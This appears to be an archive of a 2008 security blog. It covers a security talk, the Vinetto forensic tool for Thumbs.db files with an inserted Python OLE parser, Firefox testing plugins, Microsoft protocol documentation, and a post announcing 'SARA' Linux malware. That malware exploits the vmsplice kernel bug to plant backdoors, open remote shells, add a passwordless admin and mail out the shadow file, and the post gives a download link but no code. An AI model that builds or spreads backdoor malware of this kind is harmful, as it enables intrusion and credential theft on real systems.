Below is a link to a presentation I used in a talk at the Coopam school here in Orlândia. The talk was given to university students of the Information Systems and Business Administration courses. I spoke about basic topics of the subject, attack techniques and defense mechanisms.
Link:
http://rapidshare.com/files/121181348/seguranca.pdf.html
Monday, June 09, 2008
Thursday, April 10, 2008
Examining thumbs.db files with Vinetto
Vinetto is a forensics tool to examine Thumbs.db files.
It is a command line Python script that works on Linux, Mac OS X and Cygwin (win32).
Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of their FAT32 or NTFS filesystems.
The thumbnails and associated metadata are stored in Thumbs.db files.
The Thumbs.db files are undocumented OLE structured files.
Once a picture file has been deleted from the filesystem, the related thumbnail and associated metadata remain stored in the Thumbs.db file. So, the data contained in those Thumbs.db files are a helpful source of information for the forensic investigator. Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...
Link: http://vinetto.sourceforge.net/
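As an added illustration (not code from the original post or from the Vinetto project), the Python script below parses the OLE compound file structure that Thumbs.db uses: it reads the header, assembles the FAT from the header's DIFAT slots, walks the directory sectors and follows a stream's sector chain. Instead of a real Thumbs.db it builds a constructed sample file; the stream names "1" and "Catalog" and their contents are constructed for the sample and are not a claim about the real Thumbs.db layout. The directory is scanned entry by entry rather than through the sibling tree, so entries that are no longer linked still show up, and streams below the mini-stream cutoff are listed but not followed.

```python
import struct

# Compound file constants (MS-CFB). Sector numbers count from the end of the 512-byte header.
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN, FATSECT, FREESECT, NOSTREAM = 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFF
TYPE_NAMES = {1: "storage", 2: "stream", 5: "root"}


def _sector(data, size, n):
    """Return the bytes of sector n (sector 0 starts right after the header)."""
    return data[(n + 1) * size:(n + 2) * size]


def _read_fat(data, size):
    """Assemble the FAT from the FAT sectors listed in the header's DIFAT array.
    Only the 109 header DIFAT slots are followed, enough for files up to ~7 MB."""
    fat = []
    for fat_sector in struct.unpack_from("<109I", data, 0x4C):
        if fat_sector == FREESECT:
            break
        fat.extend(struct.unpack("<%dI" % (size // 4), _sector(data, size, fat_sector)))
    return fat


def _chain(fat, start):
    """Yield the sector numbers of a chain; the seen-set stops loops in a corrupted FAT."""
    seen, s = set(), start
    while s < len(fat) and s not in seen:
        seen.add(s)
        yield s
        s = fat[s]


def list_entries(data):
    """Scan every directory entry linearly (not via the sibling tree) and return
    (name, type, start_sector, size) tuples, including entries no longer linked."""
    if data[:8] != MAGIC:
        raise ValueError("not an OLE compound file")
    size = 1 << struct.unpack_from("<H", data, 0x1E)[0]      # sector shift -> sector size
    first_dir = struct.unpack_from("<I", data, 0x30)[0]      # first directory sector
    fat, entries = _read_fat(data, size), []
    for s in _chain(fat, first_dir):
        block = _sector(data, size, s)
        for off in range(0, size, 128):                      # 128-byte directory entries
            name_len, obj_type = struct.unpack_from("<HB", block, off + 0x40)
            if obj_type not in TYPE_NAMES:
                continue                                     # unused (type 0) or unknown
            name = block[off:off + max(name_len - 2, 0)].decode("utf-16-le")
            start, length = struct.unpack_from("<IQ", block, off + 0x74)
            entries.append((name, TYPE_NAMES[obj_type], start, length))
    return entries


def read_stream(data, name):
    """Return the content of a named stream kept in regular sectors, or None when it is
    below the mini-stream cutoff (mini streams are not followed in this example)."""
    size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    cutoff = struct.unpack_from("<I", data, 0x38)[0]
    for ename, etype, start, length in list_entries(data):
        if ename == name and etype == "stream":
            if length < cutoff:
                return None
            fat = _read_fat(data, size)
            return b"".join(_sector(data, size, s) for s in _chain(fat, start))[:length]
    raise KeyError(name)


def _dir_entry(name, obj_type, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM,
               start=ENDOFCHAIN, length=0):
    """Pack one 128-byte directory entry (UTF-16LE name with NUL terminator)."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    return (raw.ljust(64, b"\x00")
            + struct.pack("<HBBIII", len(raw), obj_type, 1, left, right, child)
            + b"\x00" * 36                       # CLSID, state bits, timestamps (zeroed)
            + struct.pack("<IQ", start, length))


def build_sample_thumbs_db():
    """Constructed sample: a 512-byte-sector compound file whose two 4096-byte streams
    ("1" and "Catalog") are interleaved across sectors 2..17, as a real FAT may be."""
    thumb = b"\xFF\xD8" + b"\x00" * 4094                 # JPEG SOI marker, then padding
    catalog = b"CATALOG".ljust(4096, b"\x00")
    fat = [FATSECT, ENDOFCHAIN] + [FREESECT] * 126       # sector 0 = FAT, 1 = directory
    body = []
    for i in range(8):
        t, c = 2 + 2 * i, 3 + 2 * i                      # thumb in even, catalog in odd sectors
        fat[t] = t + 2 if i < 7 else ENDOFCHAIN
        fat[c] = c + 2 if i < 7 else ENDOFCHAIN
        body.append(thumb[i * 512:(i + 1) * 512])
        body.append(catalog[i * 512:(i + 1) * 512])
    directory = (_dir_entry("Root Entry", 5, child=1)
                 + _dir_entry("1", 2, right=2, start=2, length=len(thumb))
                 + _dir_entry("Catalog", 2, start=3, length=len(catalog))
                 + b"\x00" * 128)
    header = (MAGIC + b"\x00" * 16
              + struct.pack("<HHHHH", 0x3E, 3, 0xFFFE, 9, 6) + b"\x00" * 6
              + struct.pack("<9I", 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
              + struct.pack("<109I", 0, *[FREESECT] * 108))
    return header + struct.pack("<128I", *fat) + directory + b"".join(body)


if __name__ == "__main__":
    blob = build_sample_thumbs_db()
    for name, etype, start, length in list_entries(blob):
        print("%-12s %-8s start=%-4d size=%d" % (name, etype, start, length))
    print(read_stream(blob, "1")[:2].hex())
```

Run as a script it prints the three directory entries of the constructed sample and the first two bytes of stream "1". Pointing list_entries at the bytes of a real Thumbs.db lists which thumbnail streams are still present, which is exactly why the file stays interesting after the pictures themselves were deleted; a full extractor such as Vinetto additionally handles the mini stream and the thumbnail encoding, which this example leaves out.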
Friday, March 28, 2008
Thursday, March 27, 2008
Firefox Web Application Testing Tools
Lightweight and portable is always a benefit for web application exploitation tools. Take a look at this open-source plugin for Firefox and see how it fares against today's web applications.
Link:
Darknet.org
Tuesday, March 25, 2008
Monday, February 25, 2008
Microsoft started a Protocols Program
Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.
Tuesday, February 19, 2008
SARA Linux Malware
Hi all!
I released today a basic malware to exploit the vmsplice bug in the Linux kernel.
This program uses the vulnerability to install some backdoors on the system.
UPDATED
Actions:
- disable INPUT rules on the firewall
- open port 1407 to execute remote commands
- open a bash session on port 14071 using the xinetd daemon
- add an admin user without password
- schedule malicious tasks on cron
- mail the shadow file to a mail account
Vulnerable systems: Linux 2.6.17 - 2.6.24.1
Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.
Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz